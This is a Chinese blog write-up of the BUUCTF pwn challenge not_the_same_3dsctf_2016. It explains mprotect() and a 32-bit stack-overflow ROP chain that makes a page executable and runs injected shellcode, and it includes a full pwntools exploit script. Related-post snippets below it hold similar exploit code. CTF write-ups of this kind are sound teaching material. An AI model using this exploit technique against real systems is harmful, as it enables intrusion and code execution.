pwn刷题记录之not_the_same_3dsctf_2016

最新推荐文章于 2023-01-12 20:29:14 发布
最新推荐文章于 2023-01-12 20:29:14 发布
阅读量254 收藏
点赞数
分类专栏: buuctf刷题记录 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64195960/article/details/125404232
版权

前言:这道题目有一个没见过的姿势,写一篇来记录一下

一、checksec看一下保护

开了栈不可执行保护

二、main函数

发现了gets()函数存在栈溢出

三、get_secret函数

1)分析

我们发现 flag.txt被存在了那个&unk.....里面

然后fgets函数是不能实现栈溢出的,不然可以考虑栈溢出然后用write函数读这块区域

2)这里需要用到我们的新姿势,搜索得到mprotect函数

这里补充一下ida的小操作,我们可以把鼠标放在左侧函数名称列表这里,按ctrl+f可以搜索函数名

3)mprotect()函数说明

在Linux中,mprotect()函数可以用来修改一段指定内存区域的保护属性。

函数原型如下:

#include <unistd.h> 

#include <sys/mmap.h> 

int mprotect(const void *start, size_t len, int prot);

mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。

prot可以取以下几个值,并且可以用“|”将几个属性合起来使用:

1)PROT_READ:表示内存段内的内容可读;

2)PROT_WRITE:表示内存段内的内容可写;

3)PROT_EXEC:表示内存段中的内容可执行;

4)PROT_NONE:表示内存段中的内容根本没法访问。

需要指出的是,锁指定的内存区间必须包含整个内存页(4K)。区间开始的地址start必须是一个内存页的起始地址,并且区间长度len必须是页大小的整数倍。

如果执行成功,则返回0;如果执行失败,则返回-1,并且设置errno变量,说明具体因为什么原因造成调用失败。错误的原因主要有以下几个:

1)EACCES

该内存不能设置为相应权限。这是可能发生的,比如,如果你 mmap(2) 映射一个文件为只读的,接着使用 mprotect() 标志为 PROT_WRITE。

2)EINVAL

start 不是一个有效的指针,指向的不是某个内存页的开头。

3)ENOMEM

内核内部的结构体无法分配。

4)ENOMEM

进程的地址空间在区间 [start, start+len] 范围内是无效,或者有一个或多个内存页没有映射。

如果调用进程内存访问行为侵犯了这些设置的保护属性,内核会为该进程产生 SIGSEGV (Segmentation fault,段错误)信号,并且终止该进程。

简而言之就是可以修改栈的执行权限

四、利用思路

ctrl+s查看段表,修改.got.plt(0x080EB000)为可读可写可执行

有人疑问了为什么是0x80EB000而不是bss段的开头0x80EBF80,因为指定的内存区间必须包含整个内存页(4K),起始地址 start 必须是一个内存页的起始地址,并且区间长度 len 必须是页大小的整数倍。

通过ROPgadget查找我们所需要的,因为mprotect需要三个参数,所以我们找有三个pop一个ret的就好啦

这里我们找到的地址是0x0806fcc8

payload =b'a'*0x2d+ p32(mprotect) +p32(pop3_ret)

第一个是栈溢出,注意这里不用覆盖exp

由于编译器或者其他种种原因,不是每个程序都有esp的(虽然大部分都有)

提醒:做题不要直接F5还是应该看看汇编

第二个是mprotect函数的返回地址

第三个是我们找的三个pop的地址

payload+=p32(addr)+p32(0x100) +p32(0x7)

第一个是修改地址

第二个是修改长度

第三个修改为可读可写可执行就把它修改为0x7就好了

payload +=p32(read) +p32(pop3_ret)

第一个将返回地址修改为read函数的返回地址

第二个是三个pop的地址

payload +=p32(0)+p32(addr)+p32(len(shellcode))+p32(addr)

前三个是read函数的参数

第一个是read函数从哪里开始读 这个默认为0就好了

第二个是执行的地方在哪里 用我们修改好的地址

第三个是读的大小 大一点无所谓,主要是够我们写shellcode

最后一位将read函数的返回地址改为修改地址

最后完整wp

from pwn import *

p = remote("node4.buuoj.cn",26430)

elf = ELF('111')

read = elf.symbols['read']

mprotect = 0x0806ED40

addr = 0x080EB000

size1 = 0x7

size2 = 0x100

pop3_ret = 0x0806fcc8

shellcode = asm(shellcraft.sh())

#payload = b'a'*(0x2d)

#payload += p32(mpro_addr)

#payload += p32(target_addr)

payload =b'a'*0x2d+ p32(mprotect) +p32(pop3_ret)

payload+=p32(addr)+p32(0x100) +p32(0x7)

payload +=p32(read) +p32(pop3_ret)

payload +=p32(0)+p32(addr)+p32(len(shellcode))+p32(addr)

p.sendline(payload)

p.sendline(shellcode)

p.interactive()

这里解答一下为什么需要两个sendline,第二次的输入相当于给read函数输入,因为payload中构造的read函数还没有参数输入

参考博客

C语言之 mprotect - Max_hhg - 博客园

qwq-123
关注
专栏目录
【BUUCTF - PWN】not_the_same_3dsctf_2016
古月浪子的博客
03-27 1568
checksec一下,可以栈溢出 IDA打开看看,直接可以溢出 有一个后门函数,会把flag放在bss段上 程序有write函数,通过rop把flag打印出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sl=la...
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 502
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
BUUCTF-not_the_same_3dsctf_2016
Fzuim的博客
03-03 1669
这是一道pwn题目IDA查看伪代码查看编译属性思路1,本地可打通,远程不行思路2,正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击 通过查看字符串列表,发现有个get_secret读取flag.txt后门函数 查看编译属性 思路1,本地可打通,远程不行 也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下 #coding=utf8 from pwn import * context.log_level = 'deb
BUUCTF not_the_same_3dsctf_2016
红叶的博客
10-31 222
本题目本地与远程得用两种方案打。
【CTF】not_the_same_3dsctf_2016
凉水的博客
01-30 3844
解题思路 1 先反编译,找到mian函数 undefined4 main(void) { char local_2d [45]; printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... "); gets(local_2d); return 0; } 一看到gets,就觉得靠谱了。 2 下一步找可利用函数,构造利用链。随便翻函数列表,没找到system以及/bin/sh,说明没有可以直接获取shell的方法;再继续翻,看到了get_secret函数,以及_
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 358
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
CTF-PWN-buuctf-not_the_same_3dsctf_2016-ROP函数返回到指定位置和ROP-chain的典型使用
serfend's blog
04-20 1520
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:链接:https://pan.baidu.com/s/1Wll80yDkRvz5XMW_xIZRNQ?pwd=uye9 提取码:uye9 答案:flag{c264d02e-6de6-4164-82a6-bdcb6c8ba64f} 总体思路 发现题目存在溢出点,并且给了flag相关的函数 但是此题是静态编译的,有很多其他不必要的函数,可以尝试直接使用ROP-chain方法get-shell 详细步骤 查看文件信
BUUCTF-PWN-not_the_same_3dsctf_2016
Henlenl的博客
05-19 207
文章目录查看文件信息IDA静态分析exp 查看文件信息 开了个NX保护 IDA静态分析 开始看上去 其实就是利用gets()来溢出的 我们可以 shift+f12 查看字符串 可以看到 flag.txt 这个字符串 我们进去看一看…开始的思路其实是利用gets函数溢出来覆盖返回地址去读出flag,然后利用get_secret函数的输入点造成溢出覆盖返回地址到write函数的地址,打印出unk_80CF91B里面储存flag的内容,但是要知道的是,fgets函数其实是有保护机制的,所以我们利用这个是读
BUUCTF(pwn)not_the_same_3dsctf_2016
半岛铁盒的博客
03-28 254
from pwn import* p=remote('node3.buuoj.cn',29208) get_secret=0x80489a0 flag=0x80eca2d write=0x806e270 payload='a'*0x2d+p32(get_secret)+p32(write)+p32(0)+p32(1)+p32(flag)+p32(45) p.senline(payload) p.interactive() 有疑问的欢迎留言❄
not_the_same_3dsctf_2016
z1r0的博客
12-04 120
not_the_same_3dsctf_2016 查看保护 这里有一个溢出,还有一个后门,只不过不能输出,所以劫持write这个函数来进行输出 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25451) else: r = process(file_n
[BUUCTF-pwn]——not_the_same_3dsctf_2016
Y_peak的博客
02-10 867
not_the_same_3dsctf_2016 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 首先checksec一下,看看32位程序 在IDA中,发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp shift+F12看下,发现了flag.txt这种敏感 字符串 找到调用的函数get_secret函数 函数调用后,flag储存在fl4g里面,我们找到fl4g的位置 找到可以输出的write函数 下面我们就可
【BUUCTFPWN】not_the_same_3dsctf_2016
最新发布
m0_55368674的博客
01-12 393
【BUUCTF - PWN】not_the_same_3dsctf_2016题解
[BUUCTF]PWN14——not_the_same_3dsctf_2016
mcmuyanga的博客
08-29 2021
[BUUCTF]PWN14——not_the_same_3dsctf_2016 题目网址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 步骤: 例行检查,32位,开启了nx保护 nc一下看看程序大概的执行情况,没看出个所以然 32位ida载入,shift+f12查看程序里的字符串,发现flag.txt 双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置,我们要想办法将这个地
buuctf not_the_same_3dsctf_2016
carol2358的博客
04-16 286
一开始没看到get_secret函数,去用mprotect去做了,结果报错卡住了。 思路是用write把get_serect写到bss里的flag显示出来,write bss就可以。 exp: from pwn import * from LibcSearcher import * context(log_level = 'debug',arch ='i386',os = 'linux'...
CTF刷题笔记:whitegive_pwn漏洞分析与plt/got表利用
本笔记记录了作者在CTF(Capture The Flag)比赛中的刷题经验,特别关注于一道名为"whitegive_pwn"的挑战。该题目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow)漏洞利用,主要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值